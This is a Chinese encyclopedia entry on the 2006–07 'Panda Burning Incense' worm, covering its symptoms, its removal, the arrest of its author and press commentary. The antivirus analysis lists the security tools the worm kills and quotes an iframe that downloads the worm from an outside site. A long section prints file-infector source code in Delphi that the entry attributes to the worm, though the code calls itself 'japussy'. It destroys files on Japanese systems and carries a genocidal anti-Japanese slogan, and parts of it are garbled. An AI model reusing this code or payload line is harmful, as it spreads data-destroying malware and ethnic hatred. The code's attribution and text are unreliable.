熊猫烧香

跑跑卡丁車 : 網絡用語 : 網絡安全 : 中國 >江西 >贛州 >於都縣 > 熊貓燒香

·No. 1	·No. 2	·基本信息
·病毒描述	·中毒癥狀	·危害
·殺毒方法	·解决辦法	·變種病毒
·破案介紹	·傳播方法	·傳播對象和運行過程
·一些報道和評論	·熊貓燒香的病毒源碼	·熊貓燒香的第一版作者道歉信
·變種：金豬報喜	·基本信息	·熊貓燒香的第一版作者道歉信
·病毒製造者	·變種病毒	·相關報道和評論
·相關詞	·包含詞	·更多結果...

No. 1

　　【註】一種蠕蟲病毒名，曾引起千萬臺電腦係統癱瘓。

No. 2

　　【熊貓燒香】
　　釋義：①為電腦愛好者創造了一句新問候語：今天你燒了嗎？②“微笑殺手”，可愛是它最好的偽裝，溫柔的一刀常常讓人有砸電腦的衝動。
　　典故：一隻熊貓拿着三支香，這個圖像一度令電腦用戶膽戰心驚。從2006年底到2007年初，“熊貓燒香”在短短時間內通過網絡傳播全國，數百萬臺電腦中毒。2007年2月，“熊貓燒香”病毒設計者李俊歸案，交出殺病毒軟件。據李俊交代，其於2006年10月16日編製了“熊貓燒香”病毒並在網上廣泛傳播，還以自己出售和由他人代賣的方式，在網絡上將該病毒銷售給120餘人，非法獲利10萬餘元。9月24日，湖北省仙桃市法院一審以破壞計算機信息係統罪判處李俊有期徒刑４年。這是我國偵破的國內首例製作計算機病毒的大案。具有諷刺意味的是，李俊因就業無門而製造病毒予以發泄，案發後，卻有十多傢網絡公司與他聯繫，甚至有公司欲以100萬年薪邀請他加盟。
　　例句：①“熊貓燒香”是一個草根成名的畸形標本。②“熊貓燒香”案帶出黑色病毒産業鏈。
　　關聯詞：病毒、李俊、互聯網犯罪

基本信息

　　病毒名稱:熊貓燒香，worm.whboy.（金山稱），worm.nimaya.（瑞星稱）
　　病毒別名：尼姆亞，武漢男生，後又化身為“金豬報喜”
　　危險級別：★★★★★
　　病毒類型：蠕蟲病毒，能夠終止大量的反病毒軟件和防火墻軟件進程。
　　影響係統：win 9x/me、win 2000/nt、win xp、win 2003

病毒描述

　　其實是一種蠕蟲病毒的變種，而且是經過多次變種而來的。尼姆亞變種w(worm.nimaya.w)，由於中毒電腦的可執行文件會出現“熊貓燒香”圖案，所以也被稱為“熊貓燒香”病毒。用戶電腦中毒後可能會出現藍屏、頻繁重啓以及係統硬盤中數據文件被破壞等現象。同時，該病毒的某些變種可以通過局域網進行傳播，進而感染局域網內所有計算機係統，最終導致企業局域網癱瘓，無法正常使用，它能感染係統中exe，com，pif，src，html，asp等文件，它還能中止大量的反病毒軟件進程並且會刪除擴展名為gho的文件，該文件是一係統備份工具ghost的備份文件，使用戶的係統備份文件丟失。被感染的用戶係統中所有.exe可執行文件全部被改成熊貓舉着三根香的模樣。

中毒癥狀

　　除了通過網站帶毒感染用戶之外，此病毒還會在局域網中傳播，在極短時間之內就可以感染幾千臺計算機，嚴重時可以導致網絡癱瘓。中毒電腦上會出現“熊貓燒香”圖案，所以也被稱為“熊貓燒香”病毒。中毒電腦會出現藍屏、頻繁重啓以及係統硬盤中數據文件被破壞等現象。

危害

　　病毒會刪除擴展名為gho的文件，使用戶無法使用ghost軟件恢復操作係統。“熊貓燒香”感染係統
　　的.exe .com. pif.src l.asp文件，添加病毒網址，導致用戶一打開這些網頁文件，ie就會自動連接到指定的病毒網址中下載病毒。在硬盤各個分區下生成文件autorun.inf和setup.exe，可以通過u盤和移動硬盤等方式進行傳播，並且利用windows係統的自動播放功能來運行，搜索硬盤中的.exe可執行文件並感染，感染後的文件圖標變成“熊貓燒香”圖案。“熊貓燒香”還可以通過共享文件夾、係統弱口令等多種方式進行傳播。該病毒會在中毒電腦中所有的網頁文件尾部添加病毒代碼。一些網站編輯人員的電腦如果被該病毒感染，上傳網頁到網站後，就會導致用戶瀏覽這些網站時也被病毒感染。據悉，多傢著名網站已經遭到此類攻擊，而相繼被植入病毒。由於這些網站的瀏覽量非常大，致使“熊貓燒香”病毒的感染範圍非常廣，中毒企業和政府機構已經超過千傢，其中不乏金融、稅務、能源等關係到國計民生的重要單位。註：江蘇等地區成為“熊貓燒香”重災區。

殺毒方法

　　各種版本的熊貓燒香專殺
　　瑞星：http://it.rising.com.cn/channels/service/2006-11/1163505486d38734.shtml
　　金山：http://tool.duba.net/zhuansha/253.shtml
　　江民：http://www.jiangmin.com/download/zhuansha04
　　超級巡警：http://www.dswlab.com/dow/d2l
　　李俊：http://www.xdowns.com/soft/8/21/2007/soft_34735l 雖然用戶及時更新殺毒軟件病毒庫，並下載各殺毒軟件公司提供的專殺工具，即可對“熊貓燒香”病毒進行查殺，但是如果能做到防患於未然豈不更好。

解决辦法

　　【1】立即檢查本機administrator組成員口令，一定要放棄簡單口令甚至空口令，安全的口令是字母數字特殊字符的組合，自己記得住，別讓病毒猜到就行。
　　修改方法：右鍵單擊我的電腦，選擇管理，瀏覽到本地用戶和組，在右邊的窗格中，選擇具備管理員權限的用戶名，單擊右鍵，選擇設置密碼，輸入新密碼就行。
　　【2】利用組策略，關閉所有驅動器的自動播放功能。
　　步驟：單擊開始，運行，輸入gpedit.msc，打開組策略編輯器，瀏覽到計算機配置，管理模板，係統，在右邊的窗格中選擇關閉自動播放，該配置缺省是未配置，在下拉框中選擇所有驅動器，再選取已啓用，確定後關閉。最後，在開始，運行中輸入gpupdate，確定後，該策略就生效了。
　　【3】修改文件夾選項，以查看不明文件的真實屬性，避免無意雙擊騙子程序中毒。
　　步驟：打開資源管理器(按windows徽標鍵＋e)，點工具菜單下文件夾選項，再點查看，在高級設置中，選擇查看所有文件，取消隱藏受保護的操作係統文件，取消隱藏文件擴展名。
　　【4】時刻保持操作係統獲得最新的安全更新，不要隨意訪問來源不明的網站，特別是微軟的ms06-014漏洞，應立即打好該漏洞補丁。
　　同時，qq、uc的漏洞也可以被該病毒利用，因此，用戶應該去他們的官方網站打好最新補丁。此外，由於該病毒會利用ie瀏覽器的漏洞進行攻擊，因此用戶還應該給ie打好所有的補丁。如果必要的話，用戶可以暫時換用firefox、opera等比較安全的瀏覽器。
　　【5】啓用windows防火墻保護本地計算機。同時，局域網用戶盡量避免創建可寫的共享目錄，已經創建共享目錄的應立即停止共享。
　　此外，對於未感染的用戶，病毒專傢建議，不要登錄不良網站，及時下載微軟公佈的最新補丁，來避免病毒利用漏洞襲擊用戶的電腦，同時上網時應采用“殺毒軟件+防火墻”的立體防禦體係。

變種病毒

破案介紹

　　我國破獲的國內首例製作計算機病毒的大案
　　[2007年2月12日]湖北省公安廳12日宣佈，根據統一部署，湖北網監在浙江、山東、廣西、天津、廣東、四川、江西、雲南、新疆、河南等地公安機關的配合下，一舉偵破了製作傳播“熊貓燒香”病毒案，抓獲病毒作者李俊（男，25歲，武漢新洲區人），他於2006年10月16日編寫了“熊貓燒香”病毒並在網上廣泛傳播，並且還以自己出售和由他人代賣的方式，在網絡上將該病毒銷售給120餘人，非法獲利10萬餘元。
　　其他重要犯罪嫌疑人：雷磊（男，25歲，武漢新洲區人）、王磊（男，22歲，山東威海人）、葉培新（男，21歲，浙江溫州人）、張順（男，23歲，浙江麗水人）、王哲（男，24歲，湖北仙桃人）通過改寫、傳播“熊貓燒香”等病毒，構建“僵屍網絡”，通過盜竊各種遊戲賬號等方式非法牟利。
　　這是中國近些年來，發生比較嚴重的一次蠕蟲病毒發作。影響較多公司，造成較大的損失。且對於一些疏於防範的用戶來說，該病毒導致較為嚴重的損失。
　　由於此病毒可以盜取用戶名與密碼，因此，帶有明顯的牟利目的。所以，作者纔有可能將此病毒當作商品出售，與一般的病毒製作者衹是自娛自樂、或顯示威力、或炫耀技術有很大的不同。
　　另，製作者李俊在被捕後，在公安的監視下，又在編寫解毒軟件。

傳播方法

　　“熊貓燒香”還可以通過共享文件夾、係統弱口令等多種方式進行傳播。
　　金山分析：這是一個感染型的蠕蟲病毒,它能感染係統中exe,com,pif,src,html,asp等文件,它還能中止大量的反病毒軟件進程
　　1 拷貝文件
　　病毒運行後,會把自己拷貝到
　　c:windowssystem32driversspoclsv.exe
　　2 添加註册表自啓動
　　病毒會添加自啓動項
　　hkey_current_usersoftwaremicrosoftwindowscurrentversion un
　　svcshare -> c:windowssystem32driversspoclsv.exe
　　3 病毒行為
　　a:每隔1秒
　　尋找桌面窗口,並關閉窗口標題中含有以下字符的程序
　　qqkav
　　qqav
　　防火墻
　　進程
　　virusscan
　　網鏢
　　殺毒
　　毒霸
　　瑞星
　　江民
　　黃山ie
　　超級兔子
　　優化大師
　　木馬剋星
　　木馬清道夫
　　qq病毒
　　註册表編輯器
　　係統配置實用程序
　　卡巴斯基反病毒
　　symantec antivirus
　　duba
　　esteem proces
　　緑鷹pc
　　密碼防盜
　　噬菌體
　　木馬輔助查找器
　　system safety monitor
　　wrapped gift killer
　　winsock expert
　　遊戲木馬檢測大師
　　msctls_statusbar32
　　pjf(ustc)
　　icesword
　　並使用的鍵盤映射的方法關閉安全軟件icesword
　　添加註册表使自己自啓動
　　hkey_current_usersoftwaremicrosoftwindowscurrentversion un
　　svcshare -> c:windowssystem32driversspoclsv.exe
　　並中止係統中以下的進程:
　　mcshield.exe
　　vstskmgr.exe
　　naprdmgr.exe
　　updaterui.exe
　　tbmon.exe
　　scan32.exe
　　ravmond.exe
　　ccenter.exe
　　ravtask.exe
　　rav.exe
　　ravmon.exe
　　ravmond.exe
　　ravstub.exe
　　kvxp.kxp
　　kvmonxp.kxp
　　kvcenter.kxp
　　kvsrvxp.exe
　　kregex.exe
　　uihost.exe
　　trojdie.kxp
　　frogagent.exe
　　logo1_.exe
　　logo_1.exe
　　rundl132.exe
　　b:每隔18秒
　　點擊病毒作者指定的網頁,並用命令行檢查係統中是否存在共享
　　共存在的話就運行net share命令關閉admin$共享
　　c:每隔10秒
　　下載病毒作者指定的文件,並用命令行檢查係統中是否存在共享
　　共存在的話就運行net share命令關閉admin$共享
　　d:每隔6秒
　　刪除安全軟件在註册表中的鍵值
　　hkey_local_machinesoftwaremicrosoftwindowscurrentversion un
　　ravtask
　　kvmonxp
　　kav
　　kavpersonal50
　　mcafeeupdaterui
　　network associates error reporting service
　　shstartexe
　　ylive.exe
　　yassistse
　　並修改以下值不顯示隱藏文件
　　hkey_local_machinesoftwaremicrosoftwindowscurrentversionexploreradvancedfolderhiddenshowall
　　checkedvalue -> 0x00
　　刪除以下服務:
　　navapsvc
　　wscsvc
　　kpfwsvc
　　sndsrvc
　　ccproxy
　　ccevtmgr
　　ccsetmgr
　　spbbcsvc
　　symantec core lc
　　npfmntor
　　mskservice
　　firesvc
　　e:感染文件
　　病毒會感染擴展名為exe,pif,com,src的文件,把自己附加到文件的頭部
　　並在擴展名為htm,html, asp,php,jsp,aspx的文件中添加一網址,
　　用戶一但打開了該文件,ie就會不斷的在後臺點擊寫入的網址,達到
　　增加點擊量的目的,但病毒不會感染以下文件夾名中的文件:
　　window
　　winnt
　　system volume information
　　recycled
　　windows nt
　　windowsupdate
　　windows media player
　　outlook express
　　internet explorer
　　netmeeting
　　common files
　　complus applications
　　messenger
　　installshield installation information
　　msn
　　microsoft frontpage
　　movie maker
　　msn gamin zone
　　g:刪除文件
　　病毒會刪除擴展名為gho的文件,該文件是一係統備份工具ghost的備份文件
　　使用戶的係統備份文件丟失.
　　瑞星最新病毒分析報告：“nimaya（熊貓燒香）”
　　這是一個傳染型的download 使用delphi編寫

傳播對象和運行過程

　　★本地磁盤感染
　　病毒對係統中所有除了盤符為a,b的磁盤類型為drive_remote,drive_fixed的磁盤進行文件遍歷感染
　　註:不感染文件大小超過10485760字節以上的.
　　(病毒將不感染如下目錄的文件):
　　microsoft frontpage
　　movie maker
　　msn gamin zone
　　common files
　　windows nt
　　recycled
　　system volume information
　　documents and settings
　　……
　　(病毒將不感染文件名如下的文件):
　　setup.exe
　　ntdetect.com
　　病毒將使用兩類感染方式應對不同後綴的文件名進行感染
　　1)二進製可執行文件(後綴名為:exe,scr,pif,com): 將感染目標文件和病毒溶合成一個文件(被感染文件貼在病毒文件尾部)完成感染.
　　2)腳本類(後綴名為:htm,html,asp,php,jsp,aspx): 在這些腳本文件尾加上如下鏈接(下邊的頁面存在安全漏洞):
　　<iframe src=http://www.krvkr.com/worm width=height=0></iframe>
　　在感染時會刪除這些磁盤上的後綴名為.gho
　　2.★生成autorun.inf
　　病毒建立一個計時器以，6秒為周期在磁盤的根目錄下生成setup.exe(病毒本身) autorun.inf 並利用autorun open關聯使病毒在用戶點擊被感染磁盤時能被自動運行。
　　3.★局域網傳播
　　病毒生成隨機個局域網傳播綫程實現如下的傳播方式：
　　當病毒發現能成功聯接攻擊目標的139或445端口後，將使用內置的一個用戶列表及密碼字典進行聯接。（猜測被攻擊端的密碼）當成功的聯接上以後將自己復製過去並利用計劃任務啓動激活病毒。
　　修改操作係統的啓動關聯
　　下載文件啓動
　　與殺毒軟件對抗

一些報道和評論

　　“‘流氓軟件’和病毒之間的界限已變得越來越模糊。為了達到更好的傳播效果，並減少成本，不少中小廠商直接使用病毒進行‘流氓推廣’。”昨日，反病毒專傢直指流氓軟件是這次“熊貓燒香”幕後黑手。
　　據江民公司反病毒工程師稱，已經發現了近期瘋狂肆虐的“熊貓燒香”幕後勢力的痕跡，“熊貓燒香”病毒被懷疑是由“超級巡警”軟件的提供方在幕後推動，網上已經發現了産銷一條竜盜竊銷售網遊設備的産業鏈。
　　而從瑞星截獲的“熊貓燒香(worm.nimaya)”樣本進行分析，也有不少變種運行後會去從網上下載盜取“江湖”、“大話西遊”、“魔獸”等網絡遊戲賬號的木馬。用戶的計算機一旦被感染這些木馬，遊戲的賬號、裝備等就會被黑客竊取。黑客通過在網上倒賣網遊賬號、裝備等獲利。
　　流氓軟件分化：部分“洗白” 部分病毒化。全民範圍內的討伐使流氓軟件開始出現“分化”。
　　北京瑞星股份有限公司反病毒工程師史瑀嚮《每日經濟新聞》表示，迫於技術和輿論的壓力，製作流氓軟件的廠商開始兩極分化。一些大牌互聯網廠商逐漸“洗白”，將軟件的“流氓”程度降低，還有一些廠商幹脆放棄推廣“流氓軟件”。然而，仍有大量的中小廠商是通過“流氓軟件”起傢的，通過“流氓軟件”進行廣告推廣已經成為其公司主要甚至是唯一的收入來源。2006年下半年開始，一些廠商為了生存，不惜鋌而走險，使用更加卑劣的手段進行流氓推廣，並且采用更加惡毒的技術公然嚮反病毒軟件、反流氓軟件工具挑戰。
　　據瑞星公司客戶服務中心的統計數據表明，從2006年6月開始，用戶計算機由於流氓軟件問題導致崩潰的求助數量已經超過了病毒。
　　據專傢介紹，這一時期的“流氓軟件”有兩大特點：一是編寫病毒化。不少“流氓軟件”為了防止被殺毒軟件或流氓軟件卸載工具發現，采用了病毒常用的rootkit技術進行自我保護。rootkit可以對自身及指定的文件進行隱藏或鎖定，防止被發現和刪除。帶有rootkit的“流氓軟件”就像練就了“金鐘罩”、“鐵布杉”，不除去這層保護根本難傷其毫發。更有一些流氓軟件，采用“自殺式”技術攻擊殺毒軟件。一旦發現用戶安裝或運行殺毒軟件，便運行惡意代碼，直接造成計算機死機、藍屏，讓用戶誤以為是殺毒軟件存在問題。
　　二是傳播病毒化。為了達到更好的傳播效果，並減小成本，不少中小廠商直接使用病毒進行“流氓推廣”。用戶的計算機感染病毒後，病毒會自動在後臺運行，下載並安裝“流氓軟件”。同時，“流氓軟件”安裝後也會去從互聯網自動下載運行病毒。大量的“流氓軟件”開始使用電腦病毒來隱藏自身、進行快速傳播、並對抗用戶的清除等，這些行為嚴重危害到用戶的信息安全和利益。“流氓軟件”和病毒之間的界限已變得越來越模糊。隨着“流氓軟件”不斷朝着病毒的方向發展，要想徹底殺滅“流氓軟件”就必須采用反病毒技術。
　　利益驅使流氓軟件製造“熊貓燒香”？
　　史瑀表示，2006年11月14日，瑞星發佈流氓軟件專用清除工具———卡卡上網安全助手3.0，首次將反病毒技術應用於反流氓軟件當中。就在卡卡剛剛發佈24小時，就有一個名為“my123”的惡意程序頂風作案，瘋狂采用病毒化的編寫技術來逃避卡卡的追殺，隨後又出現了名為“3448.com”和“7939.com”兩個流氓軟件，它們鎖定用戶瀏覽器的首頁以提高其網站訪問量。
　　此後，部分流氓軟件開始和病毒合作。早先一個傳播較廣的蠕蟲病毒“威金蠕蟲(worm.viking)”，就會從病毒作者指定的網站去下載流氓軟件、盜號木馬等，並種植在用戶的計算機上。
　　“大量‘流氓軟件’開始使用電腦病毒來隱藏自身、進行快速傳播、並對抗用戶的清除等，這些行為嚴重危害到用戶的信息安全和利益。”史瑀稱，“‘熊貓燒香’病毒成為一個‘教科書’式的病毒，勢必有大量的病毒會模仿它的特徵進行編寫。”
　　1月29日，金山毒霸反病毒中心最新消息：“熊貓燒香”化身“金豬”，危害指數再度升級，按照目前“熊貓燒香”破壞程度，威脅將延伸至春節。而在瑞星全球反病毒監測網27日監測結果顯示，27日一個“電眼間諜變種bsf(trojan.spy.delf.bsf)”病毒又出現，該病毒與“熊貓燒香”病毒類似。
　　而業內人士稱，近日由於地震引起海底光纜中斷，造成數百萬使用國外殺毒軟件的個人用戶、數十萬企業和政府局域網用戶無法升級。這又意味着這些用戶的電腦完全嚮病毒和黑客敞開了大門。
　　“在沒有法律法規出臺前，流氓軟件是不會縮手的，不排除‘熊貓燒香’是流氓軟件所為。”昨日，中國反流氓軟件聯盟李佳衡表示：“衹要有利益驅使，流氓軟件就會變化形式，以更不容易察覺的病毒方式毫無忌憚地牟取利益。”
　　熊貓燒香”化身“金豬”，春節大爆發。
　　“長假是病毒的高發期，特別是長假之後，病毒綜合癥接踵而來。”金山毒霸反病毒專傢戴光劍說，“目前我們已經截獲‘金豬’的變種。被感染的電腦中不但‘熊貓’成群，而且‘金豬’能使係統被破壞，大量軟件無法應用。”這一觀點得到了上海市計算機病毒防範服務中心的認同。
　　一旦中毒，用戶也不用慌張，用戶可撥打上海市信息化服務熱綫電話9682000尋求幫助。張丹
　　“熊貓燒香”病毒攻略：防禦和解除方法
　　計世網消息在2007年新年出現的“pe_fujacks”就是最近讓廣大互聯網用戶聞之色變的“熊貓燒香”。該病毒的作者為“武漢男生”(文件末簽名”whboy”)，這個版本的病毒已經集成了pe_fuja ck和qq大盜的代碼，通過網絡共享,文件感染和移動存儲設備傳播，尤其是感染網頁文件，並在網頁文件寫入自動更新的代碼，一旦瀏覽該網頁，就會感染更新後的變種。
　　不幸中招的用戶都知道，“熊貓燒香”會占用局域網帶寬，使得電腦變得緩慢，計算機會出現以下癥狀：熊貓燒香病毒會在網絡共享文件夾中生成一個名為gamesetup.exe的病毒文件；結束某些應用程序以及防毒軟件的進程，導致應用程序異常，或不能正常執行，或速度變慢；硬盤分區或者u盤不能訪問使用；exe程序無法使用程序圖標變成熊貓燒香圖標；硬盤的根目錄出現setup.exe auturun.inf文件；同時瀏覽器會莫名其妙地開啓或關閉。
　　該病毒主要通過瀏覽惡意網站、網絡共享、文件感染和移動存儲設備(如u盤)等途徑感染，其中網絡共享和文件感染的風險係數較高，而通過web和移動存儲感染的風險相對較低。該病毒會自行啓動安裝，生成註册列表和病毒文件%system%driversspoclsv.exe ，並在所有磁盤跟目錄下生成病毒文件setup.exe,autorun.inf 。

熊貓燒香的病毒源碼

　　program japussy;
　　uses
　　windows, sysutils, classes, graphics, shellapi{, registry};
　　const
　　headersize = 82432; //病毒體的大小
　　iconoffset = eb8; //pe文件主圖標的偏移量
　　//在我的delphi5 sp1上面編譯得到的大小，其它版本的delphi可能不同
　　//查找2800000020的十六進製字符串可以找到主圖標的偏移量
　　{
　　headersize = 38912; //upx壓縮過病毒體的大小
　　iconoffset = bc; //upx壓縮過pe文件主圖標的偏移量
　　//upx 1.24w 用法: upx -9 --8086 japussy.exe
　　}
　　iconsize = e8; //pe文件主圖標的大小--744字節
　　icontail = iconoffset + iconsize; //pe文件主圖標的尾部
　　id = 444444; //感染標記
　　//垃圾碼，以備寫入
　　catchword = 'if a race need to be killed out, it must be yamato. ' +
　　'if a country need to be destroyed, it must be japan! ' +
　　'*** w32.japussy.worm.a ***';
　　{$r *.res}
　　function registerserviceprocess(dwprocessid, dwtype: integer): integer;
　　stdcall; external 'kernel32.dll'; //函數聲明
　　var
　　tmpfile: string;
　　si: startupinfo;
　　pi: process_information;
　　isjap: boolean = false; //日文操作係統標記
　　{ 判斷是否為win9x }
　　function iswin9x: boolean;
　　var
　　ver: tosversioninfo;
　　begin
　　result := false;
　　ver.dwosversioninfosize := sizeof(tosversioninfo);
　　if not getversionex(ver) then
　　exit;
　　if (ver.dwplatformid = ver_platform_win32_windows) then //win9x
　　result := true;
　　end;
　　{ 在流之間復製 }
　　procedure copystream(src: tstream; sstartpos: integer; dst: tstream;
　　dstartpos: integer; count: integer);
　　var
　　scurpos, dcurpos: integer;
　　begin
　　scurpos := src.position;
　　dcurpos := dst.position;
　　src.seek(sstartpos, 0);
　　dst.seek(dstartpos, 0);
　　dst.copyfrom(src, count);
　　src.seek(scurpos, 0);
　　dst.seek(dcurpos, 0);
　　end;
　　{ 將宿主文件從已感染的pe文件中分離出來，以備使用 }
　　procedure extractfile(filename: string);
　　var
　　sstream, dstream: tfilestream;
　　begin
　　try
　　sstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);
　　try
　　dstream := tfilestream.create(filename, fmcreate);
　　try
　　sstream.seek(headersize, 0); //跳過頭部的病毒部分
　　dstream.copyfrom(sstream, sstream.size - headersize);
　　finally
　　dstream.free;
　　end;
　　finally
　　sstream.free;
　　end;
　　except
　　end;
　　end;
　　{ 填充startupinfo結構 }
　　procedure fillstartupinfo(var si: startupinfo; state: word);
　　begin
　　si.cb := sizeof(si);
　　si.lpreserved := nil;
　　si.lpdesktop := nil;
　　si.lptitle := nil;
　　si.dwflags := startf_useshowwindow;
　　si.wshowwindow := state;
　　si.cbreserved2 := 0;
　　si.lpreserved2 := nil;
　　end;
　　{ 發帶毒郵件 }
　　procedure sendmail;
　　begin
　　//郵件終止
　　end;
　　{ 感染pe文件 }
　　procedure infectonefile(filename: string);
　　var
　　hdrstream, srcstream: tfilestream;
　　icostream, dststream: tmemorystream;
　　iid: longint;
　　aicon: ticon;
　　infected, ispe: boolean;
　　i: integer;
　　buf: array[0..1] of char;
　　begin
　　try //出錯則文件正在被使用，退出
　　if comparetext(filename, 'japussy.exe') = 0 then //是自己則不感染
　　exit;
　　infected := false;
　　ispe := false;
　　srcstream := tfilestream.create(filename, fmopenread);
　　try
　　for i := 0 to 8 do //檢查pe文件頭
　　begin
　　srcstream.seek(i, sofrombeginning);
　　srcstream.read(buf, 2);
　　if (buf[0] = #80) and (buf = #69) then //pe標記
　　begin
　　ispe := true; //是pe文件
　　break;
　　end;
　　end;
　　srcstream.seek(-4, sofromend); //檢查感染標記
　　srcstream.read(iid, 4);
　　if (iid = id) or (srcstream.size < 10240) then //太小的文件不感染
　　infected := true;
　　finally
　　srcstream.free;
　　end;
　　if infected or (not ispe) then //如果感染過了或不是pe文件則退出
　　exit;
　　icostream := tmemorystream.create;
　　dststream := tmemorystream.create;
　　try
　　aicon := ticon.create;
　　try
　　//得到被感染文件的主圖標(744字節)，存入流
　　aicon.releasehandle;
　　aicon.handle := extracticon(hinstance, pchar(filename), 0);
　　aicon.savetostream(icostream);
　　finally
　　aicon.free;
　　end;
　　srcstream := tfilestream.create(filename, fmopenread);
　　//頭文件
　　hdrstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);
　　try
　　//寫入病毒體主圖標之前的數據
　　copystream(hdrstream, 0, dststream, 0, iconoffset);
　　//寫入目前程序的主圖標
　　copystream(icostream, 22, dststream, iconoffset, iconsize);
　　//寫入病毒體主圖標到病毒體尾部之間的數據
　　copystream(hdrstream, icontail, dststream, icontail, headersize - icontail);
　　//寫入宿主程序
　　copystream(srcstream, 0, dststream, headersize, srcstream.size);
　　//寫入已感染的標記
　　dststream.seek(0, 2);
　　iid := 444444;
　　dststream.write(iid, 4);
　　finally
　　hdrstream.free;
　　end;
　　finally
　　srcstream.free;
　　icostream.free;
　　dststream.savetofile(filename); //替換宿主文件
　　dststream.free;
　　end;
　　except;
　　end;
　　end;
　　{ 將目標文件寫入垃圾碼後刪除 }
　　procedure smashfile(filename: string);
　　var
　　filehandle: integer;
　　i, size, mass, max, len: integer;
　　begin
　　try
　　setfileattributes(pchar(filename), 0); //去掉衹讀屬性
　　filehandle := fileopen(filename, fmopenwrite); //打開文件
　　try
　　size := getfilesize(filehandle, nil); //文件大小
　　i := 0;
　　randomize;
　　max := random(15); //寫入垃圾碼的隨機次數
　　if max < 5 then
　　max := 5;
　　mass := size div max; //每個間隔塊的大小
　　len := length(catchword);
　　while i < max do
　　begin
　　fileseek(filehandle, i * mass, 0); //定位
　　//寫入垃圾碼，將文件徹底破壞掉
　　filewrite(filehandle, catchword, len);
　　inc(i);
　　end;
　　finally
　　fileclose(filehandle); //關閉文件
　　end;
　　_delete_file(pchar(filename)); //刪除之
　　except
　　end;
　　end;
　　{ 獲得可寫的驅動器列表 }
　　function getdrives: string;
　　var
　　disktype: word;
　　d: char;
　　str: string;
　　i: integer;
　　begin
　　for i := 0 to 25 do //遍歷26個字母
　　begin
　　d := chr(i + 65);
　　str := d + ':';
　　disktype := getdrivetype(pchar(str));
　　//得到本地磁盤和網絡盤
　　if (disktype = drive_fixed) or (disktype = drive_remote) then
　　result := result + d;
　　end;
　　end;
　　{ 遍歷目錄，感染和摧毀文件 }
　　procedure loopfiles(path, mask: string);
　　var
　　i, count: integer;
　　fn, ext: string;
　　subdir: tstrings;
　　searchrec: tsearchrec;
　　msg: tmsg;
　　function isvaliddir(searchrec: tsearchrec): integer;
　　begin
　　if (searchrec.attr <> 16) and (searchrec.name <> '.') and
　　(searchrec.name <> '..') then
　　result := 0 //不是目錄
　　else if (searchrec.attr = 16) and (searchrec.name <> '.') and
　　(searchrec.name <> '..') then
　　result := 1 //不是根目錄
　　else result := 2; //是根目錄
　　end;
　　begin
　　if (findfirst(path + mask, faanyfile, searchrec) = 0) then
　　begin
　　repeat
　　peekmessage(msg, 0, 0, 0, pm_remove); //調整消息隊列，避免引起懷疑
　　if isvaliddir(searchrec) = 0 then
　　begin
　　fn := path + searchrec.name;
　　ext := uppercase(extractfileext(fn));
　　if (ext = '.exe') or (ext = '.scr') then
　　begin
　　infectonefile(fn); //感染可執行文件
　　end
　　else if (ext = '') or (ext = 'l') or (ext = '.asp') then
　　begin
　　//感染html和asp文件，將base64編碼後的病毒寫入
　　//感染瀏覽此網頁的所有用戶
　　//哪位大兄弟願意完成之？
　　end
　　else if ext = '.wab' then //outlook地址簿文件
　　begin
　　//獲取outlook郵件地址
　　end
　　else if ext = '.adc' then //foxmail地址自動完成文件
　　begin
　　//獲取foxmail郵件地址
　　end
　　else if ext = 'ind' then //foxmail地址簿文件
　　begin
　　//獲取foxmail郵件地址
　　end
　　else
　　begin
　　if isjap then //是倭文操作係統
　　begin
　　if (ext = '.doc') or (ext = '.xls') or (ext = '.mdb') or
　　(ext = '.mp3') or (ext = '.rm') or (ext = '.ra') or
　　(ext = '.wma') or (ext = '.zip') or (ext = '.rar') or
　　(ext = '.mpeg') or (ext = '.asf') or (ext = '.jpg') or
　　(ext = '.jpeg') or (ext = '.gif') or (ext = '.swf') or
　　(ext = '.pdf') or (ext = '.chm') or (ext = '.avi') then
　　smashfile(fn); //摧毀文件
　　end;
　　end;
　　end;
　　//感染或刪除一個文件後睡眠200毫秒，避免cpu占用率過高引起懷疑
　　sleep(200);
　　until (findnext(searchrec) <> 0);
　　end;
　　findclose(searchrec);
　　subdir := tstringlist.create;
　　if (findfirst(path + '*.*', fadirectory, searchrec) = 0) then
　　begin
　　repeat
　　if isvaliddir(searchrec) = 1 then
　　subdir.add(searchrec.name);
　　until (findnext(searchrec) <> 0);
　　end;
　　findclose(searchrec);
　　count := subdir.count - 1;
　　for i := 0 to count do
　　loopfiles(path + subdir.strings + '', mask);
　　freeandnil(subdir);
　　end;
　　{ 遍歷磁盤上所有的文件 }
　　procedure infectfiles;
　　var
　　driverlist: string;
　　i, len: integer;
　　begin
　　if getacp = 932 then //日文操作係統
　　isjap := true; //去死吧！
　　driverlist := getdrives; //得到可寫的磁盤列表
　　len := length(driverlist);
　　while true do //死循環
　　begin
　　for i := len downto 1 do //遍歷每個磁盤驅動器
　　loopfiles(driverlist + ':', '*.*'); //感染之
　　sendmail; //發帶毒郵件
　　sleep(1000 * 60 * 5); //睡眠5分鐘
　　end;
　　end;
　　{ 主程序開始 }
　　begin
　　if iswin9x then //是win9x
　　registerserviceprocess(getcurrentprocessid, 1) //註册為服務進程
　　else //winnt
　　begin
　　//遠程綫程映射到explorer進程
　　//哪位兄台願意完成之？
　　end;
　　//如果是原始病毒體自己
　　if comparetext(extractfilename(paramstr(0)), 'japussy.exe') = 0 then
　　infectfiles //感染和發郵件
　　else //已寄生於宿主程序上了，開始工作
　　begin
　　tmpfile := paramstr(0); //創建臨時文件
　　_delete_(tmpfile, length(tmpfile) - 4, 4);
　　tmpfile := tmpfile + #32 + '.exe'; //真正的宿主文件，多一個空格
　　extractfile(tmpfile); //分離之
　　fillstartupinfo(si, sw_showdefault);
　　createprocess(pchar(tmpfile), pchar(tmpfile), nil, nil, true,
　　0, nil, '.', si, pi); //創建新進程運行之
　　infectfiles; //感染和發郵件
　　end;
　　end.

熊貓燒香的第一版作者道歉信

　　各位網友：
　　你們好!我是熊貓燒香的第一版作者.
　　我真的沒有想到熊貓燒香在短短的兩個月竟然瘋狂感染到這個地步,真的是我的不對,或許真的是我低估了網絡的力量,它的散播速度是我想不到的!對於所有中毒的網友,企業來說,可能是一個很大的打擊,我對此表示深深的歉意!很對不起!
